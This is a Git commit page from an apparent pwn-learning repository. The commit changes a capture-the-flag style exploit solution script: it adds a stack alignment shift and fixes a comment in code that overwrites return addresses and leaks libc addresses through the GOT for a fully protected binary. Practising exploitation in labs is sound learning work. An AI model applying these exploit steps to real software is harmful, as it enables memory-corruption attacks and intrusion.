bjrjk/pwn-learning
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Fixed full-protection/stack

Browse Source
This commit is contained in:
Jack Ren
2021-09-17 14:50:20 +08:00
parent 34783fa88d
commit 83d01532b8
1 changed files with 5 additions and 1 deletions
Download Patch File Download Diff File Expand all files Collapse all files

6
full-protection/stack/answer.py
View File

@@ -61,6 +61,10 @@ print("puts GOT: %s" % hex(puts_got))
# Cannot use puts PLT to leak puts GOT there at return of main # Cannot use puts PLT to leak puts GOT there at return of main
# because PIE mode PLT use EBX to store offset but when returning EBX is null # because PIE mode PLT use EBX to store offset but when returning EBX is null
# A unified shift was applied to original shift to use in main's stack frame
# Because of the compiler's alignment
unified_shift = 4
# Write main retaddr at shift 89 to call puts # Write main retaddr at shift 89 to call puts
write_stack(p, 89 + unified_shift, puts_got) write_stack(p, 89 + unified_shift, puts_got)
# Write retaddr of puts at shift 90 back to main # Write retaddr of puts at shift 90 back to main
@@ -71,7 +75,7 @@ execute(p)
puts_libc = u32(p.recv(4)) puts_libc = u32(p.recv(4))
""" """
# Leask puts_got by using a # Leak puts_got by using a arbitary memory read
puts_libc = read_stack(p, (puts_got - user_stack_base) / 4) puts_libc = read_stack(p, (puts_got - user_stack_base) / 4)
print("puts libc: %s" % hex(puts_libc)) print("puts libc: %s" % hex(puts_libc))